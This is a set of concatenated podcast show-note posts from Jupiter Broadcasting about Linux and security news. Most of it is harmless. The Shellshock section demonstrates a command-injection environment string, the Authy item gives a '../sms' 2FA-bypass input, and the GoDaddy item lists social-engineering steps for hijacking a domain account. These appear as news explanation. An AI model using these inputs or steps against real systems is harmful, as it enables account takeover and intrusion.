Show Notes: linuxunplugged.com/449

The post Bugfix and Chill | LINUX Unplugged 449 first appeared on Jupiter Broadcasting.

MP3 Feed | HD Video Feed | iTunes Feed

Become a supporter on Patreon:

— Show Notes: —

— The Cliff Notes —

• Problem Booting Windows with AMD
• Meltdown and Spectre for Non Technical Users
• Meltdown and Spectre the Battle Continues
• Meltdown Attack Simply Explained
• What RedHat says You Need to Know
• Microsoft Haults Patches
• Microsoft Haults Patches Cont.
• Meltdown Spectre Bug Collision
• Kids Router
• RedHat Opens up Resources For You
• RedHat Resources
• Linus Torvalds Advice to Intel
• Intel CEO Sale of Stock Before Security Bug Reveal
• Intel Bug Performance Hit
• Intel Bug Fix Kernel Fix
• Canonical Updates for Meltdown and Spectre
• Intel SPI Bug Fix
• BIOS Fix Download
• Backup BIOS Fix Update
• See How the Ask Noah Show Got Started (video)
• VoxTeleSys

— Stay In Touch —

Find all the resources for this show on the Ask Noah Dashboard

Ask Noah Dashboard

Need more help than a radio show can offer? Altispeed provides commercial IT services and they’re excited to offer you a great deal for listening to the Ask Noah Show. Call today and ask about the discount for listeners of the Ask Noah Show!

Altispeed Technologies

Contact Noah

asknoah [at] jupiterbroadcasting.com

— Twitter —

• Noah – Kernellinux
• Ask Noah Show
• Altispeed Technologies
• Jupiter Broadcasting

The post RedHat with Brandon Johnson | Ask Noah 44 first appeared on Jupiter Broadcasting.

MP3 Feed | HD Video Feed | iTunes Feed

Become a supporter on Patreon:

— Show Notes: —

— The Cliff Notes —

• RedHat Opens up Resources For You
• RedHat Resources
• Linus Torvalds Advice to Intel
• Intel CEO Sale of Stock Before Security Bug Reveal
• Intel Bug Performance Hit
• Intel Bug Fix Kernel Fix
• Canonical Updates for Meltdown and Spectre
• Intel SPI Bug Fix
• BIOS Fix Download
• Backup BIOS Fix Update
• See How the Ask Noah Show Got Started (video)
• VoxTeleSys

— Stay In Touch —

Find all the resources for this show on the Ask Noah Dashboard

Ask Noah Dashboard

Need more help than a radio show can offer? Altispeed provides commercial IT services and they’re excited to offer you a great deal for listening to the Ask Noah Show. Call today and ask about the discount for listeners of the Ask Noah Show!

Altispeed Technologies

Contact Noah

asknoah [at] jupiterbroadcasting.com

— Twitter —

• Noah – Kernellinux
• Ask Noah Show
• Altispeed Technologies
• Jupiter Broadcasting

The post Meltdown & Spectre | Ask Noah 43 first appeared on Jupiter Broadcasting.

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

Show Notes:

Dropbox Kept Files Around For Years Due To ‘Delete’ Bug

• Dropbox has fixed a bug that caused old, deleted data to reappear on the site. The bug was reported by multiple support threads in the last three weeks and merged into one issue here. An anonymous Slashdot reader writes
• In some of the complaints users reported seeing folders they deleted in 2009 reappear on their devices overnight. After seeing mysterious folders appear in their profile, some users thought they were hacked. Last week, a Dropbox employee provided an explanation to what happened, blaming the issue on an old bug that affected the metadata of soon-to-be-deleted folders. Instead of deleting the files, as users wanted and regardless of metadata issues, Dropbox choose to keep those files around for years, and eventually restored them due to a blunder. In its File retention Policy, Dropbox says it will keep files around a maximum 60 days after users deleted them
• If you have sensitive data, do not rely on delete, rely on encryption.
• If you have sensitive data, you shouldn’t have it on third-party systems without encryption.
• The encryption and decryption should occur on your system, not theirs.
• Imagine you deleted those risky files just before an international trip, you get requested to power up your laptop, and bang, there’s those deleted files back….!

Twitter Activist Security – Guidelines for safer resistance

• We’ve covered privacy on the Internet before. We’ve stated very clearly that using privacy tools such as Tor is not illegal nor is it suspicious, no more so than someone paying cash at the grocery store.
• This guideline is specfically for Twitter, but many of the suggestions can be apply to other social media as well, but I am not sure how well they will travel. Chose carefully
• Many people are starting to get politically active in ways they fear might have negative repercussions for their job, career or life. It is important to realise that these fears are real, but that public overt resistance is critical for political legitimacy. This guide hopes to help reduce the personal risks to individuals while empowering their ability to act safely.
  I am not an activist, and I almost certainly don’t live in your country. These guidelines are generic with the hope that they will be useful for a larger number of people.
• Security Principles To Live By The basic principles of operational security are actually very simple, they’re what we call the three Cs: Cover, Concealment, Compartmentation

Move over skimmers, ‘shimmers’ are the newest tool for stealing credit card info

• Consumers and retailers be on guard: there’s a new and more devious way for fraudsters to steal your credit and debit card information.
• “Shimmers” are the newest form of credit card skimmers, only smaller, more powerful and practically impossible to detect. And they’re popping up all over the place, says RCMP Cpl. Michael McLaughlin, who sounded the alarm after four shimmers were extracted from checkout card readers at a Coquitlam, B.C., retailer.
• “Something this sophisticated, this organized and multi-jurisdictional has all the classic hallmarks of organized crime,” said McLaughlin.
• Unlike skimmers, a shimmer — named for its slim profile — fits inside a card reader and can be installed quickly and unobtrusively by a criminal who slides it into the machine while pretending to make a purchase or withdrawal.
• Once installed, the microchips on the shimmer record information from chip cards, including the PIN. That information is later extracted when the criminal inserts a special card — also during a purchase or cash withdrawal — which downloads the data. The information is then used to make fake cards.
• Shimmers have rendered the bigger and bulkier skimmers virtually obsolete, according to Const. Alex Bojic of the Coquitlam RCMP economic crime unit.
• “You can’t see a shimmer from the outside like the old skimmer version,” Bojic said in a statement. “Businesses and consumers should immediately report anything abnormal about the way their card is acting … especially if the card is sticking inside the machine.”
• McLaughlin said the Coquitlam retailer detected the shimmers through its newly introduced daily testing of point-of-sales terminals. A test card inserted into the machines kept on getting stuck and the shimmers were found when the terminals were opened.
• “We want to get the word out,” said McLaughlin. “Businesses really need to be checking for these kinds of devices and consumers need to be aware of them.”
• Bojic said using the tap function of a chip card is one way to avoid being “shimmed.”
  “It’s actually very secure. Each tap transfers very limited banking information, which can’t be used to clone your card,” Bojic said.
• Krebs wrote about this and has a post which is all about skimmer and shimmer
• Not new tech, been around since at least 2015

Feedback:

• FreeBSD + Bacula as a portable VM
• Bank security or lack of!

Round Up:

• Hotel ransomed by hackers as guests locked out of rooms
• ShmooCon 2017 Videos
• Google – Site Reliability Engineering
• Booted up in 1993, this server still runs — but not for much longer
• Digital Ocean re-enabling password authentication for snapshot-based droplets
• HP recalls 101,000 laptop batteries due to fire concerns.
• A Shakeup in Russia’s Top Cybercrime Unit
• Hardening Windows 10 With Zero Day Exploit Mitigations Under The Microscope
• Delta Airlines cancels at least 150 flights due to IT issue
• Texas Police Department Loses Years Worth of Evidence in Ransomware Incident
• A crowd funded effort to review “Secure HTTP without HTTPS”, from the Unity Asset Store, finds it critically flawed
• Backblaze Hard Drive Stats for 2016

The post Three C's to Tweet By | TechSNAP 304 first appeared on Jupiter Broadcasting.

We review Linux Mint 18 & our experience turns out to be a roller coaster ride from impressed glee to cautious concern. We’ve never felt more conflicted over a version of Linux Mint.

Plus we discuss the Ubuntu Forum hack, a Fedora bug that’s bricking some laptops & why we just can’t quit FreeNAS.

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

HD Video | Mobile Video | WebM Torrent | MP3 Audio | OGG Audio | YouTube | HD Torrent

RSS Feeds:

HD Video Feed | Large Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

— Show Notes: —

Brought to you by: Linux Academy

Mint 18 Review

​Linux Mint 18: The best desktop — period

I’ve been using Linux desktops since the leading desktop front-end was Bash. Things have changed in those 25 years. Today, the best Linux desktop is the latest version of Linux Mint: Linux Mint 18 Sarah with the Cinnamon 3.0 interface.

Linux Mint 18 Cinnamon: Quick Screenshot Tour

Linux Mint 18 improves security, but at a cost – TechRepublic

While this is a much-needed improvement, the explanation of this change on the Linux Mint website is baffling. The website claims that kernel updates “aren’t really updates, but the availability of packages for newer kernels.” Aside from the fact that this is literally the definition of an update, this appears to be an attempt at minimizing the importance of kernel updates. In Linux Mint 18, users are only notified of kernel updates, but they are not installed by default.

• How to upgrade to Linux Mint 18

As excited as we are about Linux Mint 18, upgrading blindly for the sake of running the latest version does not make much sense, especially if you’re already happy and everything is working perfectly.

• Bug#830624: ITP: xplayer — Simple media player based on GStreamer.

Given the history of Linux Mint with their weird view on security (Linux
Mint is the very definition of a FrankenDebian [1]) where they withhold
important security updates because their weird mixture of packages would
otherwise break too often or their hijacking of package names (mdm, for
example), I don’t really trust them to come up with a clean design for
desktop agnostic applications. Heck, the first thing they wanted to do
was naming their forked version of Pluma “xedit”.

— PICKS —

Runs Linux

Fors Fusion RUnS LINUX on a Raspberry Pi

Desktop App Pick

recalbox.com

Recalbox allows you to re-play a variety of videogame consoles and platforms in your living room, with ease! RecalboxOS is free, open source and designed to let you create your very own recalbox in no time! Raspberry Pi.

• RecalboxOS v4.0.0-beta4 release | Blog recalbox

Spotlight

Felony: Next Level PGP

Felony is an open-source pgp keychain built on the modern web with Electron, React, and Redux. Felony is the first PGP app that’s easy for anyone to use, without a tutorial. Security++ to the greatest extreme!

Coder Radio Coding Challenge

— NEWS —

Ubuntu Forums Hacked, 2 Million Users’ Details Stolen

Canonical CEO Jane Silber explains: “We were able to confirm there had been an exposure of data and shut down the Forums as a precautionary measure. Deeper investigation revealed that there was a known SQL injection vulnerability in the Forumrunner add-on in the Forums which had not yet been patched.”

The attacker was able to “download portions of the ‘user’ table which contained usernames, email addresses and IPs for 2 million users.”

• Notice of security breach on Ubuntu Forums | Ubuntu Insights

​Early Look at Skype for Linux and Chromebooks

Skype for Linux is no longer an afterthought for Microsoft as the company introduces new versions of Skype for Linux Chromebooks and the Chrome web browser.

GNOME Maps Hits A Dead End, Can No Longer Display Maps

As of this week the nifty desktop navigation app canno longer fetch maps tiles to display.

MapQuest, the application’s tile provider, has amended its usage policy and discontinued direct tile access. GNOME developers have the choice of paying to keep using the service or, ultimately, using a new one.

PSA: Failure to boot after kernel update on Skylake systems

So in the last couple of days a significant issue in all Fedora releases has come to our attention, affecting (so far) several systems that use the Intel ‘Skylake’ hardware platform.

• Virtualization Revelation | Linux Action Show 418

• Bug #1569479 “Graphics glitches with Skylake Intel HD Graphics 5…”

• Intel Skylake Graphics: Windows 10 vs. Ubuntu Linux Performance
• Well Known Linux Kernel Developer Recommends Against Buying Skylake Systems
• Early Intel Skylake Linux Users May Run Into A Silly Issue
• Screen flickering on Ubuntu 16.04 LTS

CrossOver For Android Now Running On Chromebooks

CodeWeavers confirmed today that it’s possible to run CrossOver on Chromebooks now via the Android support. CodeWeavers was even able to install Steam for Windows on the Chromebooks via the CrossOver support.

Mail Bag

• https://pastebin.com/jMJPAeXY

• https://pastebin.com/s9NWc85s

Call Box

• Chris’ call out for the community to help him with his background

Catch the show LIVE SUNDAY:

• Noon Pacific
• https://jblive.tv
• Network Calendar

— CHRIS’ STASH —

Chris’s Twitter account has changed, you’ll need to follow!

Chris Fisher (@ChrisLAS) | Twitter

Hang in our chat room:

irc.geekshed.net #jupiterbroadcasting

— NOAH’S STASH —

Noah’s Day Job

Altispeed Technologies

Contact Noah

noah [at] jupiterbroadcasting.com

Find us on Google+

• Chris
• Noah J. Chelliah
• Jupiter Broadcasting’s Page

Find us on Twitter

• Chris – ChrisLAS
• Noah – Kernellinux

Follow us on Facebook

• Jupiter Broadcasting on Facebook
• Noah – Kernellinux

The post Mint 18: Convenience Over Security | LAS 426 first appeared on Jupiter Broadcasting.

In this special episode of LAS, we go off the rails as we buckle down & prep for our visit to SCaLE live on the air! Plus picks, your feedback & more!

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

HD Video | Mobile Video | WebM Torrent | MP3 Audio | OGG Audio | YouTube | HD Torrent

RSS Feeds:

HD Video Feed | Large Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

— Show Notes: —

Brought to you by: Linux Academy

— PICKS —

Runs Linux

• This Viewers Car Runs Linux

Desktop App Pick

reep.io | peer-to-peer filesharing made easy

With reep.io you can transfer files directly to another browser.
Just point to a file you want to share. Your peer will then be able to download this file
directly from you. No data is stored on a server in-between.

Weekly Spotlight

GalliumOS – A fast and lightweight Linux distro for ChromeOS devices

A fast and lightweight Linux distro for ChromeOS devices.

Brought to you by: System76

Feedback:

• EasyTag Forks
• Gnome Boxes

SCaLE Planning

• SCaLE 14x

SCaLE 14x: The Southern California Linux Expo is upon us again! I’m looking forward to seeing & sharing with everyone in the free software community in Southern California this year; last year was a blast.

SCaLE 14x is January 21-24, 2016 at the Pasadena Convention Center

Equipment Chris is bringing:

• GoPro Hero 4
• Zoom SGH-6 Shotgun Mic
• Zoom H4n

Thanks to Ryan (@techhelper1)

• Offered the use of his 99 Cadillac Seville while at SCALE

Thanks to Brian

• Offered his long driveway, which might or might not work.

Post-Show

• SyncThing

Catch the show LIVE SUNDAY:

• Noon Pacific
• https://jblive.tv
• Network Calendar

— CHRIS’ STASH —

Chris’s Twitter account has changed, you’ll need to follow!

Chris Fisher (@ChrisLAS) | Twitter

Hang in our chat room:

irc.geekshed.net #jupiterbroadcasting

— NOAH’S STASH —

Noah’s Day Job

Altispeed Technologies

Contact Noah

noah [at] jupiterbroadcasting.com

Find us on Google+

• Chris
• Noah J. Chelliah
• Jupiter Broadcasting’s Page

Find us on Twitter

• Chris – ChrisLAS
• Noah – Kernellinux

Follow us on Facebook

• Jupiter Broadcasting on Facebook
• Noah – Kernellinux

The post Pre SCaLE LAS | LAS 401 first appeared on Jupiter Broadcasting.

Ang and Mike discuss business operational tools, practices & common issues, how Ang got her kids started on computers, good languages to get started with & she makes a pretty poignant comment about Linux. Mike discusses TarDisk & whether or not he recommends it & more!

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

MP3 Audio | OGG Audio | Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | Video Feed | Torrent Feed | iTunes Audio | iTunes Video

Become a supporter on Patreon:

Show Notes:

Hoopla:

• TarDisk Review | dominickm.com
• PyCharm

WTR’s:

• Code Saves Time | WTR 48 | Jupiter Broadcasting
• Technology For Connection | WTR 43 | Jupiter Broadcasting
• Sharing with Intent | WTR 45 | Jupiter Broadcasting

The post Linux: Bug or Feature? | CR 188 first appeared on Jupiter Broadcasting.

A Critical OpenSSH flaw can expose your private keys, a new WiFi spec for IoT devices, that has all the classic issues & Intel’s SkyLake bug.

Plus your feedback, our answers, a rockin’ round up & so much more!

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

— Show Notes: —

Critical OpenSSH flaw can expose your private keys and other client memory

• Two major issues have been identified in OpenSSH
• CVE-2016-0777: An information leak (memory disclosure) can be exploited by a rogue SSH server to trick a client into leaking sensitive data from the client memory, including for example private keys.
• Vendor contributed code for a feature called Roaming, was added in OpenSSH 5.4, that allowed broken SSH sessions to be resumed. The server side code for this was never activated, only the commercial SSH server supported it.
• However, the Roaming feature is on by default, and due to a but a malicious server can exploit the bug to read memory from the client when it tries to connect to the server
• This includes the ability to steal your SSH private keys
• “The authentication of the server host key prevents exploitation by a man-in-the-middle, so this information leak is restricted to connections to malicious or compromised servers.”
• Because OpenSSH checks the host key of the remote server, if you are connecting to trusted servers, there is no risk
• You can disable the feature by adding the following line to your /etc/ssh/ssh_config: UseRoaming no
• The feature can also be disabled on a per-user basis using: ~/.ssh/config
• The patch just disabled this feature by default
• CVE-2016-0778
• A buffer overflow (leading to file descriptor leak), can also be exploited by a rogue SSH server, but due to another bug in the code is possibly not exploitable, and only under certain conditions (not the default configuration), when using ProxyCommand, ForwardAgent or ForwardX11.
• Both of these vulnerabilities are fixed in OpenSSH 7.1p2
• It is not clear if the roaming support will be removed entirely
• Researcher Post

Bug in Intel Skylake CPUs means complex workloads can hang the machine

• Intel has confirmed that its Skylake processors suffer from a bug that can cause a system to freeze when performing complex workloads.
• The bug was reportedly discovered and tested by the the community at hardwareluxx.de and passed onto GIMPS (Great Internet Mersenne Prime Search), which conducted further testing. Both groups passed their findings onto Intel.
• Intel states:

“Intel has identified an issue that potentially affects the 6th Gen Intel Core family of products. This issue only occurs under certain complex workload conditions, like those that may be encountered when running applications like Prime95. In those cases, the processor may hang or cause unpredictable system behaviour.”

• Intel has developed a fix, and is working with hardware partners to distribute it via a BIOS update.
• No reason has been given as to why the bug occurs, but it’s confirmed to affect both Linux and Windows-based systems.
• While the bug was discovered using Prime95, it could affect other industries that rely on complex computational workloads, such as scientific and financial institutions.
• Recently, Intel’s Haswell and early Broadwell processors suffered from a TSX (Transactional Synchronization Extensions) bug. Rather than recall the parts, Intel disabled the TSX instructions via a microcode update delivered via new motherboard firmware.
• Additional Coverage

New WiFi spec for IoT devices, WiFi HaLow likely has all the classic issues

• “The new protocol is based on the 802.11ah standard from the IEEE and is being billed as Wi-Fi HaLow by the Wi-Fi Alliance. Wi-Fi HaLow differs from the wireless signal that most current devices uses in a couple of key ways. First, it’s designed as a low-powered protocol and will operate in the range below one gigahertz. Second, the protocol will have a much longer range than traditional Wi-Fi, a feature that will make it attractive for use in applications such as connecting traffic lights and cameras in smart cities.”
• There is also talk of using it for wearables, I suppose as a replacement for bluetooth
• “Wi-Fi HaLow is well suited to meet the unique needs of the Smart Home, Smart City, and industrial markets because of its ability to operate using very low power, penetrate through walls, and operate at significantly longer ranges than Wi-Fi today,” said Edgar Figueroa, president and CEO of Wi-Fi Alliance.
• “But, as with any new protocol or system, Wi-Fi HaLow will carry with it new security considerations to face. And one of the main challenges will be securing all of the various implementations of the protocol. Device manufacturers all implement things in their own way and in their own time, a practice that has led to untold security vulnerabilities and innumerable billable hours for security consultants. Security experts don’t expect Wi-Fi HaLow to be the exception.”
• “While the standard could be good and secure, implementations by different vendors can have weaknesses and security issues. This is common to all protocols,” said Cesar Cerrudo, CTO of IOActive Labs, who has done extensive research on the security of a wide range of smart devices and smart city environments
• Who could possibly be worse at implementing security, than the vendors and government contractors that would be used for a “smart city”
• “Many of the devices that may use the new protocol–which isn’t due for release for a couple of years–are being manufactured by companies that aren’t necessarily accustomed to thinking about threat modeling, potential attacks, and other issues that computer hardware and software makers have had to face for decades. That could lead to simple implementation problems that attackers can take advantage of.”
• This seems to call for a nice clean BSD licensed implementation, although even then, everyone using the same implementation could be just as risky
• Plus, as we have seen, most vendors will ship an old insecure version, rather than the latest, and won’t update the implementation as they iterate their product
• The extended range of HaLow also means that attackers can come from much further away, making it harder to physically protect devices
• “Each new iteration in technology brings with it fresh security and privacy considerations, and the proliferation of connected non-computing devices is no different. The concept of a voice-enabled hub that controls your home’s climate, entertainment, and other systems is now a reality, as is the ability to send an email from your refrigerator. That’s all well and good, until these smart devices start doing really dumb things.”

Feedback:

• Will ZFS work for me?
• HTTP/2 Thoughts?
• UK Government Web Portal Hijacked by Russian Casino Spammers – (I just discovered this)

Round Up:

• US Intelligence director’s personal e-mail, phone hacked
• Seagate announces 10TB helium hard drive, 7 platters, 14 heads
• Why Is Comcast Interrupting My Web-Browsing To Upsell Me On A New Modem?
• Police say they can decrypted Blackberry PGP encrypted emails
• Cisco patches more hard-coded passwords
• Ontario court rules that police “Tower Dumps” violate the Canadian Charter of Rights and Freedoms
• Fixstars Releases 13 TB SSD for Specific Application Workloads
• Apple OS X memory management bug means your porn lives in your video card
• Daily Telegraph Installs Workplace Monitors On Journalists’ Desks

The post Internet of Threats | TechSNAP 249 first appeared on Jupiter Broadcasting.

A fresh version of LibreOffice hits the web, another Flash attack in the wild, this one uses “malvertising”. What the heck is malvertising? We discuss.

Plus what the state of Android looks like in 2015, another OS X bug & more!

Direct Download:

MP3 Audio | OGG Audio | Video | HD Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | iTunes Feed | Video Feed | Video Feed | Torrent Feed

Become a supporter on Patreon

Show Notes:

• New Features | LibreOffice – Free Office Suite – Fun Project – Fantastic People
• Another Flash attack spotted, this time against Yahoo! users
• OS X Bug Exploited To Infect Macs Without Need For Password – Slashdot
• This is what Android fragmentation looks like in 2015
• This is what Android looks like in 2015 | The Verge

The post Lousy Lollipop Adoption | TTT 202 first appeared on Jupiter Broadcasting.

The new OnePlus 2 specs, price, availability & everything else you should know are out. Motorola doubles down on Moto X with Style, Play & updates Moto G. Microsoft’s Arrow Launcher for Android, Razer acquires OUYA & Scientists confirm ‘impossible’ EM Drive propulsion.

Direct Download:

MP3 Audio | OGG Audio | Video | HD Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | iTunes Feed | Video Feed | Video Feed | Torrent Feed

Become a supporter on Patreon

Show Notes:

• OnePlus 2 specs, price, availability and everything else you should know
• Motorola doubles down on Moto X with Style and Play, and updates Moto G – CNET
• This is Microsoft’s Arrow Launcher for Android (download APK)
• Some Steam Accounts Hijacked Following Security Lapse
• Razer Acquires OUYA Software Assets | techPowerUp
• Scientists Confirm ‘Impossible’ EM Drive Propulsion | Hacked
• Smoking Gun: MPAA Emails Reveal Plan To Run Anti-Google Smear Campaign Via Today Show And WSJ | Techdirt

The post EMerging Science | TTT 197 first appeared on Jupiter Broadcasting.

Microsoft takes 4 years to fix a nasty bug, how to bypass 2 factor authentication in the popular ‘Authy’ app.

Hijacking a domain with photoshop, hardware vs software RAID revisited, tons of great questions, our answers & much much more!

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

— Show Notes: —

Microsoft took 4 years to recover privileged TLS certificate addresses

• The way TLS certificates are issued currently is not always foolproof
• In order to get a TLS certificate, you must prove you own the domain that you are attempting to request the certificate for
• Usually, the way this is done is sending an email to one of the administrative addresses at the domain, like postmaster@, hostmaster@, administrator@, or abuse@
• The problem comes when webmail services, like hotmail, allow these usernames to be registered
• That is exactly what happened with Microsoft’s live.be and live.fi
• A Finnish man reported to Microsoft that he had been able to get a valid HTTPS certificate for live.fi by registering the address hostmaster@live.fi
• It took Microsoft four to six weeks to solve the problem
• Additional Coverage – Ars Technica
• When this news story came out, another man, from Belgium, came forward to say he reported the same problem with live.be over 4 years ago
• “After the Finnish man used his address to obtain a TLS certificate for the live.fi domain, Microsoft warned users it could be used in man-in-the-middle and phishing attacks. To foreclose any chance of abuse, Microsoft advised users to install an update that will prevent Internet Explorer from trusting the unauthorized credential. By leaving similar addresses unsecured, similar risks may have existed for years.”

Bypass 2 factor authentication in popular ‘Authy’ app

• Authy is a popular reusable 2 factor authentication API
• It allows 3rd party sites to easily implement 2 factor authentication
• Maybe a little too easily
• When asked for the verification code that is sent to your phone after a request to Authy is received, simply entering ../sms gives you access to the application
• The problem is that the 3rd party sites send the request, and just look for a ‘success’ response
• However, because the input is interpreted in the URL, the number you enter is not fed to: https://api.authy.com/protected/json/verify/1234/authy_id as it is expected to be
• But rather, the url ends up being: https://api.authy.com/protected/json/verify/../sms/authy_id
• Which is actually interpreted by the Authy API as: https://api.authy.com/protected/json/sms/authy_id
• This API call is the one used to actually send the code to the user
• This call sends another token to the user and returns success
• The 3rd party application sees the ‘success’ part, and allows the user access
• It seems like a weak design, there should be some kind of token that is returned and verified, or the implementation instructions for the API should be explicit about checking “token”:”is valid” rather than just “success”:true
• Also, the middleware should probably not unescape and parse the user input

Hijacking a domain

• An article where a reporter had a security researcher steal his GoDaddy account, and document how it was done
• A combination of social engineering, publically available information, and a photoshopped government ID, allowed the security researcher to take over the GoDaddy account, and all of the domains inside of it
• This could allow:
• an attacker to inject malware into your site
• redirect your email, capturing password reset emails from other services
• redirect traffic from your website to their own
• issue new SSL certificates for your sites, allowing them to perform man-in-the-middle attackers on your visitors with a valid SSL certificate
• Some of the social engineering steps:

  • Create a fake Social Media profile in the name of the victim (with the fake picture of them)

  • Create a gmail address in the name of the victim

  • Call and use myriad plausible excuses why you do not have the required information:
  • please provide your pin #? I don’t remember setting up a pin number
  • my assistant registered the domain for me, so I don’t have access to the email address used
  • my assistant used the credit card ending in: 4 made up numbers
  • create a sense of urgency: “I apologized, both for not having the information and for my daughter yelling in the background. She laughed and said it wasn’t a problem”
  • GoDaddy requires additional verification is the domain is registered to a business, however, since many people make up a business name when they register a domain, it is very common for these business to not actually exist, and there are loopholes
  • Often, you can create a letter on a fake letterhead, and it will be acceptable
• In the end, Customer Support reps are there to help the customer, it is usually rather difficult for them to get away with refusing to help the customer because they lack the required details, or seem suspicious
• GoDaddy’s automated system sends notifications when changes are made, however in this case it is often too later, the attacker has already compromised your account
• GoDaddy issued a response: “GoDaddy has stringent processes and a dedicated team in place for verifying the identification of customers when a change of account/email is requested. While our processes and team are extremely effective at thwarting illegal requests, no system is 100 percent efficient. Falsifying government issued identification is a crime, even when consent is given, that we take very seriously and will report to law enforcement where appropriate.”
• It appears that Hover.com (owned by Tucows, the same company that owns Ting) is one of the only registrars that does not allow photo ID as a form of verification, stating “anyone could just whip something up in Photoshop.”
• GoDaddy notes that forging government ID (in photoshop or otherwise) is illegal

Feedback:

• Securing apache server

• How to set up SSH server for anonymous web surfing

• Latest iPod skimming device found at cashpoints

• ZFS vs Hardware RAID

• ZFS Snapshots & MySQL Backups

• Android ZFS Monitor app

• ZFS Monitor – on Google Play

Round Up:

• Cisco will ship equipment to dead drops for its most sensitive clients, to avoid NSA interception and tampering
• “Evolution Market” a digital underground shop selling everything illegal, has shut down, apparently the founders made of with 12 million in bitcoin
• Cisco still in the process of patching FREAK SSL flaw from January
• Facebook Develops ‘Yosemite’ Open Server Chassis with Intel
• HiltonHonors reward program offering 1000 points for changing your password before April 1st
• Safari’s Private Browsing Mode Saves URLs In an Easily Accessible File
• OpenSSL announces patch for multiple vulnerabilities
• GCHQ admits to hacking ISPs and other systems
• Researchers to demo new persistent bios rootkit at CanSecWest.
• Target reaches huge settlement with security breach victims – CBS News
• Convicted tax fraudster fugitive caught by authorities

The post Two Factor Falsification | TechSNAP 206 first appeared on Jupiter Broadcasting.

The Shellshock bug is taking the internet by storm, Fedora project lead Matthew Miller joins us to discuss how this Bash bug works, how big of a problem it really is, and how large projects are responding to the issue. Plus we chat a little Fedora.next and more!

Then it’s our look at what’s great in Gnome 3.14, Ubuntu 14.10 & another systemd alternative that’s doing it right.

Thanks to:

Download:

HD Video | Mobile Video | WebM Torrent | MP3 Audio | Ogg Audio | YouTube | HD Torrent

RSS Feeds:

HD Video Feed | Large Video Feed | Mobile Video Feed | MP3 Feed | Ogg Feed | iTunes Feeds | Torrent Feed

Become a supporter on Patreon:

— Show Notes: —

Shellshock with Matthew Miller – FedoraProject

Brought to you by: System76

Shellshock BASH Vulnerability Tester

Shellshock (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187) is a vulnerability in GNU’s bash shell that gives attackers access to run remote commands on a vulnerable system. If your system has not updated bash in the last 24 hours (See patch history), you’re most definitely vulnerable and have been since first boot. This security vulnerability affects versions 1.14 (released in 1994) to the most recent version 4.3 according to NVD.

Shellshock: How does it actually work? | Fedora Magazine

And there’s quite a lot of other little cleanups in there too — security people at Fedora, at Red Hat, and around the world sure have been busy for the couple of days. Thanks to all of you for your hard work, and to Fedora’s awesome QA and Release Engineering teams, who sprung into action to make sure that these updates got to you quickly and safely.

Still more vulnerabilities in bash? Shellshock becomes whack-a-mole | Ars Technica

Here’s how the Shellshock vulnerability works, in a nutshell: an attacker sends a request to a Web server (or Git, a DHCP client, or anything else affected) that uses bash internally to interact with the operating system. This request includes data stored in an environmental variable. Environmental variables are like a clipboard for operating systems, storing information used to help it and software running on it know where to look for certain files or what configuration to start with. But in this case, the data is malformed so as to trick bash into treating it as a command, and that command is executed as part of what would normally be a benign set of script. This ability to trick bash is the shellshock bug. As a result, the attacker can run programs with the same level of access as the part of the system launching a bash shell.

Shellshock just ‘a blip’ says Richard Stallman as Bash bug attacks increase | Technology

GNU Project founder: ‘Any program can have a bug. But a proprietary program is likely to have intentional bugs’

The bash vulnerability and Docker containers | Colin Walters

In a previous post about Docker, I happened to randomly pick bash as a package shared between the host and containers. I had thought of it as a relatively innocent package, but the choice turned out to be prescient. The bash vulnerability announced today shows just how important even those apparently innocent packages can be.

shellshock – What does env x='() { :;}; command’ bash do and why is it insecure? – Unix & Linux Stack Exchange

bash stores exported function definitions as environment variables. Exported functions look like this:

$ foo() { bar; }
$ export -f foo
$ env | grep -A1 foo
foo=() {  bar
}

That is, the environment variable foo has the literal contents:

() {  bar
}

When a new instance of bash launches, it looks for these specially crafted environment variables, and interprets them as function definitions. You can even write one yourself, and see that it still works:

$ export foo='() { echo "Inside function"; }'
$ bash -c 'foo'
Inside function

Unfortunately, the parsing of function definitions from strings (the environment variables) can have wider effects than intended. In unpatched versions, it also interprets arbitrary commands that occur after the termination of the function definition. This is due to insufficient constraints in the determination of acceptable function-like strings in the environment. For example:

$ export foo='() { echo "Inside function" ; }; echo "Executed echo"'
$ bash -c 'foo'
Executed echo
Inside function

Note that the echo outside the function definition has been unexpectedly executed during bash startup. The function definition is just a step to get the evaluation and exploit to happen, the function definition itself and the environment variable used are arbitrary. The shell looks at the environment variables, sees foo, which looks like it meets the constraints it knows about what a function definition looks like, and it evaluates the line, unintentionally also executing the echo (which could be any command, malicious or not).

This is considered insecure because variables are not typically allowed or expected, by themselves, to directly cause the invocation of arbitrary code contained in them. Perhaps your program sets environment variables from untrusted user input. It would be highly unexpected that those environment variables could be manipulated in such a way that the user could run arbitrary commands without your explicit intent to do so using that environment variable for such a reason declared in the code.

— PICKS —

Runs Linux

India’s Mission to Mars, runs Linux

India has made history today by being the first and only country in the world to send a space craft to Mars in first attempt. The country also made history as it achieved it in a budget lesser than the un-scientific Hollywood block buster Gravity; India spent only $71 million on the mission.

Desktop App Pick

